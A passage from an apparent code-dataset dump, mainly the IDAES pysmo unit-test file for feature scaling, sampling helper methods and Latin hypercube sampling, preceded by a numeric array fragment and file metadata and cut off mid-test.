195,593],[420,594],[392,595],[111,596],[501,597],[127,598],[302,599],[44,600],[16,601],[448,602],[294,603],[521,604],[491,605],[424,606],[347,607],[572,608],[72,609],[532,610],[407,611],[366,612],[495,613],[557,614],[465,615],[361,616],[332,617],[606,618],[365,619],[435,620],[423,621],[207,622],[51,623],[603,624],[251,625],[192,626],[277,627],[223,628],[344,629],[64,630],[288,631],[576,632],[159,633],[387,634],[539,635],[47,636],[96,637],[115,638],[63,639],[268,640],[61,641],[77,642],[397,643],[461,644],[54,645],
[605,646],[249,647],[456,648],[208,649],[487,650],[246,651],[546,652],[314,653],[325,654],[602,655],[469,656],[110,657],[412,658],[447,659],[181,660],[504,661],[24,662],[553,663],[176,664],[235,665],[94,666],[226,667],[336,668],[183,669],[191,670],[328,671],[350,672],[470,673],[158,674],[51,675],[208,676],[425,677],[463,678],[291,679],[574,680],[51,681],[303,682],[628,683],[482,684],[114,685],[429,686],[393,687],[188,688],[249,689],[485,690],[23,691],[590,692],[245,693],[310,694],[297,695],[593,696],[585,697],[46,698],[187,699],[388,700],[561,701],[114,702],[620,703],[421,704],[672,705],[161,706],[675,707],[235,708],[544,709],[367,710],[413,711],[152,712],[395,713],[701,714],[242,715],[656,716],[585,717],[687,718],[60,719],[338,720],[21,721],[53,722],[251,723],[46,724],[539,725],[602,726],[552,727],[488,728],[722,729],[455,730],[534,731],[153,732],[732,733],[520,734],[316,735],[279,736],[522,737],[549,738],[603,739],[136,740],[579,741],[279,742],[619,743],[272,744],[145,745],[413,746],[657,747],[676,748],[59,749],[193,750],[47,751],[93,752],[220,753],[608,754],[100,755],[44,756],[376,757],[8,758],[337,759],[200,760],[120,761],[113,762],[488,763],[77,764],[24,765],[226,766],[351,767],[488,768],[100,769],[495,770],[159,771],[617,772],[44,773],[318,774],[166,775],[532,776],[577,777],[22,778],[238,779],[609,780],[513,781],[514,782],[687,783],[271,784],[118,785],[522,786],[643,787],[441,788],[202,789],[575,790],[176,791],[197,792],[503,793],[760,794],[716,795],[585,796],[99,797],[432,798],[781,799],[10,800],[165,801],[781,802],[587,803],[315,804],[694,805],[337,806],[295,807],[711,808],[226,809],[556,810],[783,811],[205,812],[9,813],[294,814],[340,815],[542,816],[332,817],[118,818],[786,819],[525,820],[666,821],[163,822],[31,823],[115,824],[591,825],[295,826],[232,827],[564,828],[246,829],[336,830],[398,831],[562,832],[810,833],[174,834],[22,835],[817,836],[568,837],[806,838],[373,839],[141,840],[296,841],[589,842],[180,843],[733,844],[366,845],[225,846],[356,847],[397,8
48],[763,849],[193,850],[693,851],[47,852],[647,853],[736,854],[830,855],[854,856],[232,857],[572,858],[427,859],[63,860],[349,861],[520,862],[658,863],[341,864],[511,865],[85,866],[261,867],[268,868],[763,869],[462,870],[55,871],[267,872],[844,873],[116,874],[346,875],[424,876],[14,877],[715,878],[819,879],[288,880],[805,881],[679,882],[745,883],[772,884],[569,885],[408,886],[548,887],[786,888],[64,889],[506,890],[779,891],[782,892],[509,893],[486,894],[326,895],[102,896],[757,897],[45,898],[481,899],[756,900],[335,901],[415,902],[608,903],[523,904],[787,905],[777,906],[268,907],[860,908],[512,909],[42,910],[261,911],[428,912],[62,913],[126,914],[849,915],[227,916],[12,917],[357,918],[755,919],[324,920],[86,921],[244,922],[493,923],[224,924],[622,925],[732,926],[873,927],[697,928],[31,929],[583,930],[414,931],[756,932],[82,933],[638,934],[172,935],[435,936],[806,937],[179,938],[648,939],[205,940],[864,941],[761,942],[253,943],[611,944],[500,945],[454,946],[644,947],[406,948],[757,949],[381,950],[832,951],[503,952],[681,953],[667,954],[337,955],[374,956],[360,957],[803,958],[120,959],[546,960],[265,961],[614,962],[885,963],[749,964],[733,965],[691,966],[640,967],[118,968],[425,969],[408,970],[855,971],[737,972],[565,973],[512,974],[673,975],[251,976],[232,977],[526,978],[586,979],[174,980],[379,981],[74,982],[256,983],[494,984],[806,985],[887,986],[892,987],[748,988],[257,989],[721,990],[281,991],[309,992],[652,993],[591,994],[569,995],[187,996],[989,997],[959,998],[63,999],[703,1000],[436,1001],[591,1002],[400,1003],[810,1004],[797,1005],[981,1006],[33,1007],[999,1008],[358,1009]]
),
]
| 566.696498
| 57,780
| 0.621336
| 25,450
| 145,641
| 3.555678
| 0.196542
| 0.000111
| 0.000099
| 0.000133
| 0.834969
| 0.834969
| 0.834969
| 0.834969
| 0.834969
| 0.834969
| 0
| 0.639907
| 0.029065
| 145,641
| 256
| 57,781
| 568.910156
| 0.000028
| 0
| 0
| 0.035156
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d64c01894842051f947d4419da10575434334b7a
| 77,654
|
py
|
Python
|
idaes/surrogate/pysmo/tests/test_sampling_modified.py
|
eslickj/idaes-pse
|
328ed07ffb0b4d98c03e972675ea32c41dd2531a
|
[
"RSA-MD"
] | 112
|
2019-02-11T23:16:36.000Z
|
2022-03-23T20:59:57.000Z
|
idaes/surrogate/pysmo/tests/test_sampling_modified.py
|
eslickj/idaes-pse
|
328ed07ffb0b4d98c03e972675ea32c41dd2531a
|
[
"RSA-MD"
] | 621
|
2019-03-01T14:44:12.000Z
|
2022-03-31T19:49:25.000Z
|
idaes/surrogate/pysmo/tests/test_sampling_modified.py
|
eslickj/idaes-pse
|
328ed07ffb0b4d98c03e972675ea32c41dd2531a
|
[
"RSA-MD"
] | 154
|
2019-02-01T23:46:33.000Z
|
2022-03-23T15:07:10.000Z
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
import sys
from idaes.surrogate.pysmo.sampling import LatinHypercubeSampling, UniformSampling, HaltonSampling, HammersleySampling, CVTSampling, SamplingMethods, FeatureScaling
import numpy as np
import pandas as pd
import pyomo.common.unittest as unittest
import pytest
class FeatureScalingTestCases(unittest.TestCase):
    """Tests for ``FeatureScaling.data_scaling_minmax`` and ``data_unscaling_minmax``.

    test_data_scaling_minmax_01-04: numpy input — 1D, 2D, 3D, and 3D with a
        constant (zero-range) column.
    test_data_scaling_minmax_05: a plain Python list input raises TypeError.
    test_data_scaling_minmax_06-09: pandas DataFrame input — 1D, 2D, 3D, and 3D
        with a constant column.
    test_data_unscaling_minmax_01-04: scaling followed by unscaling recovers the
        original numpy input exactly.
    test_data_unscaling_minmax_05: IndexError when the supplied min/max arrays
        have fewer columns than the scaled data.
    test_data_unscaling_minmax_06: IndexError when the supplied min/max arrays
        have more columns than the scaled data.
    """

    def setUp(self):
        # Fixture columns: x in 0..9, then (x + 1)^2, or x + 10 and
        # (x + 1)^2 + x + 10; the "_constant" fixtures pin the middle
        # column at 10 to exercise zero-range (constant-column) scaling.
        input_array_np_1d = np.array([[0], [1], [2], [3], [4], [5], [6], [7], [8], [9]])
        input_array_np_2d = np.array([[0, 1], [1, 4], [2, 9], [3, 16], [4, 25], [5, 36], [6, 49], [7, 64], [8, 81], [9, 100]])
        input_array_np_3d = np.array([[0, 10, 11], [1, 11, 15], [2, 12, 21], [3, 13, 29], [4, 14, 39], [5, 15, 51], [6, 16, 65], [7, 17, 81], [8, 18, 99], [9, 19, 119]])
        input_array_np_3d_constant = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
        self.test_data_numpy_1d = input_array_np_1d
        self.test_data_numpy_2d = input_array_np_2d
        self.test_data_numpy_3d = input_array_np_3d
        self.test_data_numpy_3d_constant = input_array_np_3d_constant
        # The pandas fixtures carry exactly the same values as the numpy ones.
        self.test_data_pandas_1d = pd.DataFrame(input_array_np_1d)
        self.test_data_pandas_2d = pd.DataFrame(input_array_np_2d)
        self.test_data_pandas_3d = pd.DataFrame(input_array_np_3d)
        self.test_data_pandas_3d_constant = pd.DataFrame(input_array_np_3d_constant)

    def _check_scaling_minmax(self, input_array, expected_min, expected_max):
        """Scale ``input_array`` and verify the (scaled, min, max) outputs.

        ``expected_min``/``expected_max`` are per-column value lists. Columns
        with zero range (min == max) use a divisor of 1 instead of 0 when
        building the expected scaled data, mirroring the implementation's
        constant-column handling.
        """
        output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
        expected_output_2 = np.array([expected_min])
        expected_output_3 = np.array([expected_max])
        scale = expected_output_3 - expected_output_2
        scale[scale == 0] = 1  # constant columns: avoid division by zero
        expected_output_1 = (input_array - expected_output_2) / scale
        np.testing.assert_array_equal(output_3, expected_output_3)
        np.testing.assert_array_equal(output_2, expected_output_2)
        np.testing.assert_array_equal(output_1, expected_output_1)

    def _check_unscaling_roundtrip(self, input_array):
        """Assert that scaling then unscaling reproduces ``input_array``."""
        output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
        un_output_1 = FeatureScaling.data_unscaling_minmax(output_1, output_2, output_3)
        np.testing.assert_array_equal(un_output_1, input_array)

    @pytest.mark.unit
    def test_data_scaling_minmax_01(self):
        # 1D: sample data between 0 and 9.
        self._check_scaling_minmax(self.test_data_numpy_1d, [0], [9])

    @pytest.mark.unit
    def test_data_scaling_minmax_02(self):
        # 2D: (x_1 + 1)^2 for x_1 between 0 and 9.
        self._check_scaling_minmax(self.test_data_numpy_2d, [0, 1], [9, 100])

    @pytest.mark.unit
    def test_data_scaling_minmax_03(self):
        # 3D: (x_1 + 1)^2 + x_2; x_1 in [0, 9], x_2 in [10, 19].
        self._check_scaling_minmax(self.test_data_numpy_3d, [0, 10, 11], [9, 19, 119])

    @pytest.mark.unit
    def test_data_scaling_minmax_04(self):
        # 3D with a constant column: (x_1 + 1)^2 + 10, x_1 in [0, 9].
        self._check_scaling_minmax(
            self.test_data_numpy_3d_constant, [0, 10, 11], [9, 10, 110]
        )

    @pytest.mark.unit
    def test_data_scaling_minmax_05(self):
        # A plain list (neither ndarray nor DataFrame) must raise TypeError.
        input_array = self.test_data_numpy_2d.tolist()
        with pytest.raises(TypeError):
            FeatureScaling.data_scaling_minmax(input_array)

    @pytest.mark.unit
    def test_data_scaling_minmax_06(self):
        # 1D pandas DataFrame: sample data between 0 and 9.
        self._check_scaling_minmax(self.test_data_pandas_1d, [0], [9])

    @pytest.mark.unit
    def test_data_scaling_minmax_07(self):
        # 2D pandas DataFrame: (x_1 + 1)^2 for x_1 between 0 and 9.
        self._check_scaling_minmax(self.test_data_pandas_2d, [0, 1], [9, 100])

    @pytest.mark.unit
    def test_data_scaling_minmax_08(self):
        # 3D pandas DataFrame: (x_1 + 1)^2 + x_2; x_1 in [0, 9], x_2 in [10, 19].
        self._check_scaling_minmax(self.test_data_pandas_3d, [0, 10, 11], [9, 19, 119])

    @pytest.mark.unit
    def test_data_scaling_minmax_09(self):
        # 3D pandas DataFrame with a constant column: (x_1 + 1)^2 + 10.
        self._check_scaling_minmax(
            self.test_data_pandas_3d_constant, [0, 10, 11], [9, 10, 110]
        )

    @pytest.mark.unit
    def test_data_unscaling_minmax_01(self):
        # 1D round trip.
        self._check_unscaling_roundtrip(self.test_data_numpy_1d)

    @pytest.mark.unit
    def test_data_unscaling_minmax_02(self):
        # 2D round trip.
        self._check_unscaling_roundtrip(self.test_data_numpy_2d)

    @pytest.mark.unit
    def test_data_unscaling_minmax_03(self):
        # 3D round trip.
        self._check_unscaling_roundtrip(self.test_data_numpy_3d)

    @pytest.mark.unit
    def test_data_unscaling_minmax_04(self):
        # 3D round trip with a constant column.
        self._check_unscaling_roundtrip(self.test_data_numpy_3d_constant)

    @pytest.mark.unit
    def test_data_unscaling_minmax_05(self):
        # min/max arrays narrower than the scaled data raise IndexError.
        output_1, _, _ = FeatureScaling.data_scaling_minmax(self.test_data_numpy_2d)
        min_array = np.array([[1]])
        max_array = np.array([[5]])
        with pytest.raises(IndexError):
            FeatureScaling.data_unscaling_minmax(output_1, min_array, max_array)

    @pytest.mark.unit
    def test_data_unscaling_minmax_06(self):
        # min/max arrays wider than the scaled data raise IndexError.
        output_1, _, _ = FeatureScaling.data_scaling_minmax(self.test_data_numpy_2d)
        min_array = np.array([[1, 2, 3]])
        max_array = np.array([[5, 6, 7]])
        with pytest.raises(IndexError):
            FeatureScaling.data_unscaling_minmax(output_1, min_array, max_array)
class SamplingMethodsTestCases(unittest.TestCase):
def setUp(self):
input_array_np_1d = np.array([[0], [1], [2], [3], [4], [5], [6], [7], [8], [9]])
input_array_np_2d = np.array([[0, 1], [1, 4], [2, 9], [3, 16], [4, 25], [5, 36], [6, 49], [7, 64], [8, 81], [9, 100]])
input_array_np_3d = np.array([[0,10, 11], [1,11, 15], [2,12, 21], [3,13, 29], [4,14, 39], [5,15, 51], [6,16, 65], [7,17, 81], [8,18, 99], [9,19, 119]])
self.test_data_numpy_1d = input_array_np_1d
self.test_data_numpy_2d = input_array_np_2d
self.test_data_numpy_3d = input_array_np_3d
"""
test_nearest_neighbour_01: Test behaviour with array N x d = (10,3) data and a=[-0.5,1]
test_nearest_neighbour_02: Test behaviour with array N x d = (10,2) data and a=[-0.5]
test_nearest_neighbour_03: Test behaviour with array N x d = (10,1) data and a=[]
    test_nearest_neighbour_04: works (no exception raised) even with a different input size
test_nearest_neighbour_05: Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3)
test_points_selection_01: Test behaviour with array N x d = (10,3) data and a=[[-0.5,10],[10,100]]
test_points_selection_02: Test behaviour with array N x d = (10,2) data and a=[[-0.5],[10]]
test_points_selection_03: Test behaviour with array N x d = (10,1) data and a=[[],[]] <---both return the first element
test_points_selection_04: Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3); small
test_points_selection_05: Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3); large
test_sample_point_selection_01: selection - Test behaviour with array N x d = (10,3) data and a=[[0,0],[10,19]]
test_sample_point_selection_02: selection - Test behaviour with array N x d = (10,2) data and a=[[0],[7]]
test_sample_point_selection_03: selection - Test behaviour with array N x d = (10,1) data and a=[[],[]] <---both return the first element, so return only 1 []
test_sample_point_selection_04: selection - Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3); large
test_sample_point_selection_05: selection - Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3); large
test_points_selection_06: creation - Test behaviour with points dimension should be d with array N x d = (10,3)
test_points_selection_07: creation - Test behaviour with points dimension should be d with array N x d = (10,2)
test_points_selection_08: creation - Test behaviour with points dimension should be d with array N x d = (10,1)
test_points_selection_09: creation - raise IndexError if dimension of point is not matching with array N x d = (10,3); small
test_points_selection_10: creation - raise IndexError if dimension of point is not matching with array N x d = (10,3); large
test_points_selection_01: Test behaviour with n = 3
test_points_selection_02: Test behaviour with n = 1
test_points_selection_03: Test behaviour with n = 0
test_points_selection_04: Test behaviour with n = -1
test_points_selection_04: Test behaviour with n = 2.9
test_base_conversion_01: Test behaviour with 5 to base 2
test_base_conversion_02: Test behaviour with 57 to base 47
test_base_conversion_03: Test behaviour with negative base - works, returns always 0
test_base_conversion_04: Test behaviour raise ZeroDivisionError with 0 base
    test_base_conversion_05: Test behaviour with base 1, which causes an infinite loop
test_prime_base_to_decimal_01: Test behaviour with 0.01 in base 2 to base 10
test_prime_base_to_decimal_02: Test behaviour with 0.01 in base 20 to base 10
test_prime_base_to_decimal_03: working with base 1
test_prime_base_to_decimal_04: working with base -1
test_data_sequencing: in the notes, (3,2) -> expected [0, 0.5, 0.75], but returns [0. , 0.5 , 0.25]
"""
@pytest.mark.unit
def test_nearest_neighbour_01(self):
input_array = self.test_data_numpy_3d
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [-0.5,1])
np.testing.assert_array_equal(closest_point, input_array[0,:])
@pytest.mark.unit
def test_nearest_neighbour_02(self):
input_array = self.test_data_numpy_2d
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [-0.5])
np.testing.assert_array_equal(closest_point, input_array[0,:])
@pytest.mark.unit
def test_nearest_neighbour_03(self):
input_array = self.test_data_numpy_1d
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [])
np.testing.assert_array_equal(closest_point, input_array[0,:])
    @pytest.mark.unit
    def test_nearest_neighbour_04(self):
        # Smoke test: a point shorter than the (10, 3) data still runs.
        # NOTE(review): no assertion is made and the result is unused —
        # this only checks that no exception is raised; presumably
        # intentional (see class notes above), confirm.
        input_array = self.test_data_numpy_3d
        closest_point = SamplingMethods.nearest_neighbour(self, input_array, [0.5])
@pytest.mark.unit
def test_nearest_neighbour_05(self):
input_array = self.test_data_numpy_3d
with pytest.raises(ValueError):
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [0.5,0.9,10])
@pytest.mark.unit
def test_points_selection_01(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[-0.5,10],
[10,100]])
SamplingClass = SamplingMethods()
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
np.testing.assert_array_equal(equivalent_points[0], input_array[0,:])
np.testing.assert_array_equal(equivalent_points[1], input_array[-1,:])
@pytest.mark.unit
def test_points_selection_02(self):
input_array = self.test_data_numpy_2d
generated_sample_points = np.array([[-0.5],
[10]])
SamplingClass = SamplingMethods()
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
np.testing.assert_array_equal(equivalent_points[0], input_array[0,:])
np.testing.assert_array_equal(equivalent_points[1], input_array[-1,:])
@pytest.mark.unit
def test_points_selection_03(self):
input_array = self.test_data_numpy_1d
generated_sample_points = np.array([[],
[]])
SamplingClass = SamplingMethods()
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
np.testing.assert_array_equal(equivalent_points[0], input_array[0,:])
np.testing.assert_array_equal(equivalent_points[1], input_array[0,:])
@pytest.mark.unit
def test_points_selection_04(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5],
[10]])
SamplingClass = SamplingMethods()
with pytest.raises(ValueError):
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
@pytest.mark.unit
def test_points_selection_05(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5,0.7,10],
[10,0.9,20]])
SamplingClass = SamplingMethods()
with pytest.raises(ValueError):
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
@pytest.mark.unit
def test_sample_point_selection_01(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0,0],
[10,19]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
np.testing.assert_array_equal(unique_sample_points[0], input_array[0,:])
np.testing.assert_array_equal(unique_sample_points[1], input_array[-1,:])
@pytest.mark.unit
def test_sample_point_selection_02(self):
input_array = self.test_data_numpy_2d
generated_sample_points = np.array([[0],
[7]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
np.testing.assert_array_equal(unique_sample_points[0], input_array[0,:])
np.testing.assert_array_equal(unique_sample_points[1], input_array[-1,:])
@pytest.mark.unit
def test_sample_point_selection_03(self):
input_array = self.test_data_numpy_1d
generated_sample_points = np.array([[],
[]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
np.testing.assert_array_equal(unique_sample_points[0], input_array[0,:])
@pytest.mark.unit
def test_sample_point_selection_04(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5],
[7]])
SamplingClass = SamplingMethods()
with pytest.raises(ValueError):
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
@pytest.mark.unit
def test_sample_point_selection_05(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5,1,10],
[7,19,20]])
SamplingClass = SamplingMethods()
with pytest.raises(ValueError):
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
@pytest.mark.unit
def test_sample_point_selection_06(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5,11,3],
[7,19,4]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
min_ , max_ = input_array[0, :], input_array[1, :]
testing = min_ + generated_sample_points * (max_ - min_)
np.testing.assert_array_equal(testing,unique_sample_points)
@pytest.mark.unit
def test_sample_point_selection_07(self):
input_array = self.test_data_numpy_2d
generated_sample_points = np.array([[0.5,1],
[7,19]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
min_ , max_ = input_array[0, :], input_array[1, :]
testing = min_ + generated_sample_points * (max_ - min_)
np.testing.assert_array_equal(testing,unique_sample_points)
@pytest.mark.unit
def test_sample_point_selection_08(self):
input_array = self.test_data_numpy_1d
generated_sample_points = np.array([[0.5],
[7]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
min_ , max_ = input_array[0, :], input_array[1, :]
testing = min_ + generated_sample_points * (max_ - min_)
np.testing.assert_array_equal(testing,unique_sample_points)
@pytest.mark.unit
def test_sample_point_selection_09(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[],
[]])
SamplingClass = SamplingMethods()
with pytest.raises(IndexError):
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
@pytest.mark.unit
def test_sample_point_selection_10(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5,1,10,11],
[7,19,10,12]])
SamplingClass = SamplingMethods()
with pytest.raises(IndexError):
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
@pytest.mark.unit
def test_prime_number_generator_01(self):
prime_list = SamplingMethods.prime_number_generator(self, 3)
np.testing.assert_array_equal(prime_list, [2, 3, 5])
@pytest.mark.unit
def test_prime_number_generator_02(self):
prime_list = SamplingMethods.prime_number_generator(self, 1)
np.testing.assert_array_equal(prime_list, [2])
@pytest.mark.unit
def test_prime_number_generator_03(self):
prime_list = SamplingMethods.prime_number_generator(self, 0)
np.testing.assert_array_equal(prime_list, [])
@pytest.mark.unit
def test_prime_number_generator_04(self):
prime_list = SamplingMethods.prime_number_generator(self, -1)
np.testing.assert_array_equal(prime_list, [])
@pytest.mark.unit
def test_prime_number_generator_05(self):
prime_list = SamplingMethods.prime_number_generator(self, 2.9)
np.testing.assert_array_equal(prime_list, [2, 3, 5])
@pytest.mark.unit
def test_base_conversion_01(self):
string_representation = SamplingMethods.base_conversion(self, 5, 2)
assert string_representation == ['1', '0', '1']
@pytest.mark.unit
def test_base_conversion_02(self):
string_representation = SamplingMethods.base_conversion(self, 57, 47)
assert string_representation == ['1', '10']
@pytest.mark.unit
def test_base_conversion_03(self):
string_representation = SamplingMethods.base_conversion(self, 10, -1)
assert string_representation == ['0']
@pytest.mark.unit
def test_base_conversion_04(self):
with pytest.raises(ZeroDivisionError):
string_representation = SamplingMethods.base_conversion(self, 10, 0)
# @pytest.mark.unit
# def test_base_conversion_05(self):
# string_representation = SamplingMethods.base_conversion(self, 10, 1)
@pytest.mark.unit
def test_prime_base_to_decimal_01(self):
string_representation = SamplingMethods.prime_base_to_decimal(self,['0', '0', '1'], 2)
assert 0.25 == string_representation
@pytest.mark.unit
def test_prime_base_to_decimal_02(self):
string_representation = SamplingMethods.prime_base_to_decimal(self,['0', '0', '1'], 20)
assert 0.0025 == string_representation
@pytest.mark.unit
def test_prime_base_to_decimal_03(self):
string_representation = SamplingMethods.prime_base_to_decimal(self,['0', '0', '1'], 1)
@pytest.mark.unit
def test_prime_base_to_decimal_04(self):
string_representation = SamplingMethods.prime_base_to_decimal(self,['0', '0', '1'], -1)
@pytest.mark.unit
def test_data_sequencing(self):
SamplingClass = SamplingMethods()
sequence_decimal = SamplingClass.data_sequencing(3, 2)
class LatinHypercubeSamplingTestCases(unittest.TestCase):
    """
    test__init__selection_01: input numpy array - Test behaviour generate LatinHypercubeSampling object with selection, default number of sample = 5
    test__init__selection_02: input Pandas DataFrame - Test behaviour generate LatinHypercubeSampling object with selection, default number of sample
    test__init__selection_03: input numpy array - Test behaviour generate LatinHypercubeSampling object with selection, with a selected number of sample
    test__init__selection_04: input Pandas DataFrame - Test behaviour generate LatinHypercubeSampling object with selection, with a selected number of sample
    test__init__selection_05: input numpy array - Test behaviour raise exception with a selected number of sample = 0
    test__init__selection_06: input numpy array - Test behaviour raise exception with a selected number of sample = -1
    test__init__selection_07: input numpy array - Test behaviour raise exception with a selected number of sample > input size
    test__init__selection_08: input numpy array - Test behaviour raise exception with a selected number of sample = 1.1 (non-integer)
    test__init__selection_09: input list - Test behaviour raise ValueError with list input
    test__init__creation_01: input list - Test behaviour generate LatinHypercubeSampling object with default sampling_type, default number of sample = 5
    test__init__creation_02: input list - Test behaviour generate LatinHypercubeSampling object with sampling_type = creation, default number of sample = 5
    test__init__creation_03: input list - Test behaviour generate LatinHypercubeSampling object with creation with a selected number of sample
    test__init__creation_04: input list - Test behaviour raise exception with a selected number of sample = 0
    test__init__creation_05: input list - Test behaviour raise exception with a selected number of sample = -1
    test__init__creation_06: input list - Test behaviour raise exception with a selected number of sample = 1.1 (non-integer)
    test__init__creation_07: input numpy - Test behaviour raise ValueError with numpy input
    test__init__creation_08: input pandas - Test behaviour raise ValueError with pandas input
    test__init__creation_selection_01 - Test behaviour raise Exception with sampling_type = non string
    test__init__creation_selection_02 - Test behaviour raise Exception with sampling_type = incorrect string
    test_variable_sample_creation: Test behaviour, sampled values are in the range (min, max), number of samples = 5, 10, 1
    test_lhs_points_generation: Test behaviour, sampled values are in the range (0, 1) , number of samples = 5, 10, 1, 2 d
    test_random_shuffling: Test behaviour, random_shuffling = sampled values after sorting, they are in the range (0, 1) , number of samples = 5, 10, 1, 2 d
    test_sample_points_01: Test behaviour with selection, sample points are unique, all in the input array , number of samples = 5, 10, 1, 2 d
    test_sample_points_02: Test behaviour with creation, sample points are unique, all in the input range (min,max) , number of samples = 5, 10, 1, 2 d
    """
    # Fixtures: a numpy array and an equivalent DataFrame (last column is the
    # output 'y'), plus a two-row list giving per-variable (min, max) bounds
    # for 'creation' mode.
    def setUp(self):
        input_array_np = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
        input_array_pd = pd.DataFrame({'x1': [0,1,2,3,4,5,6,7,8,9],
                                       'x2': [10,10,10,10,10,10,10,10,10,10],
                                       'y': [11,14,19,26,35,46,59,74,91,110]})
        input_array_list = [[1,10,3],[2,11,4.5]]
        self.test_data_numpy = input_array_np
        self.test_data_pandas = input_array_pd
        self.test_data_list= input_array_list
    # --- constructor, 'selection' mode ---
    @pytest.mark.unit
    def test__init__selection_01(self):
        input_array = self.test_data_numpy
        LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type="selection")
        np.testing.assert_array_equal(LHSClass.data, input_array)
        np.testing.assert_array_equal(LHSClass.number_of_samples, 5)
        np.testing.assert_array_equal(LHSClass.x_data, input_array[:, :-1])
    @pytest.mark.unit
    def test__init__selection_02(self):
        input_array = self.test_data_pandas
        LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type="selection")
        np.testing.assert_array_equal(LHSClass.data, input_array)
        np.testing.assert_array_equal(LHSClass.number_of_samples, 5)
        input_array = input_array.to_numpy()
        np.testing.assert_array_equal(LHSClass.x_data, input_array[:, :-1])
    @pytest.mark.unit
    def test__init__selection_03(self):
        input_array = self.test_data_numpy
        LHSClass = LatinHypercubeSampling( input_array, number_of_samples=6, sampling_type="selection")
        np.testing.assert_array_equal(LHSClass.data, input_array)
        np.testing.assert_array_equal(LHSClass.number_of_samples,6)
        np.testing.assert_array_equal(LHSClass.x_data, input_array[:, :-1])
    @pytest.mark.unit
    def test__init__selection_04(self):
        input_array = self.test_data_pandas
        LHSClass = LatinHypercubeSampling( input_array, number_of_samples=6, sampling_type="selection")
        np.testing.assert_array_equal(LHSClass.data, input_array)
        np.testing.assert_array_equal(LHSClass.number_of_samples,6)
        input_array = input_array.to_numpy()
        np.testing.assert_array_equal(LHSClass.x_data, input_array[:, :-1])
    @pytest.mark.unit
    def test__init__selection_05(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=0, sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_06(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=-1, sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_07(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=101, sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_08(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=1.1, sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_09(self):
